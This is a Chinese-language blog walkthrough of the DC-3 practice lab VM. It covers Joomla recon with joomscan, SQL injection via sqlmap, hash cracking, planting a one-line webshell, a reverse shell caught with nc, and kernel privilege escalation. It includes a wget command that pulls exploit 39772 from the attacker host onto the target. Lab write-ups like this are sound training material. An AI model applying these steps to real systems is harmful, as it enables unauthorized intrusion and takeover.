type
status
date
slug
summary
tags
category
icon
password
0x00 环境介绍
DC-3环境需要修改一下变量,不然无法进入,如下即可
0x01 信息搜集
老规矩了 IP 端口 web.........
1)IP收集
2)端口收集
3)子域名目录爆破
4)指纹收集
访问web页面开始渗透
0x02 渗透测试
登录web页面,熟悉的一眼看到框架---Joomla
继续使用框架扫描
joomscan --url http://192.168.213.151
得到版本
使用search寻找框架漏洞
发现sql注入
保存本地,查看
使用sqlmap开扫
爆库:
爆表:
爆字段:
查具体值
得到hash值,下一步爆破使用json爆破hash得到密码----snoopy
登录后台,继续收集渗透线索
登录后台地址
渗透突破点
通过实验发现,该处代码可以直接在站内运行,这就给我们提供的木马注入的位置,
写入一句话木马,准备getshell,注意写入木马不需要重新添加标签
访问页面管理地址,得到木马地址,准备连接
获取getshell
写入反弹shell,攻击机建立nc接受,
得到更加直观的感觉,获取交互shell
0x03 权限提升
思路:这次需要用到一个特殊的提权方式,内核提权,首先我们通过查找服务器漏洞得到exp文件,运行提权文件即可
确定服务器版本
确定版本为16.04
使用search搜索漏洞
下载漏洞报告,发现exp利用
下载文件:
如果无法下载,在攻击机上面下载后用到下列方法,共享到靶机shellpython -m SimpleHTTPServer 8080 #将本路径下文件共享外连靶机下载:wget http://192.168.213.129:8080/39772.zip
提权成功:
0x04 知识点总结
1.内核提权
2.主机共享文件
python -m SimpleHTTPServer 8080 #将本路径下文件共享外连靶机下载:wget http://192.168.213.129:8080/39772.zip
- 作者:告白
- 链接:https://www.gbsec.top/article/%E6%B8%97%E9%80%8FDC-3-%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。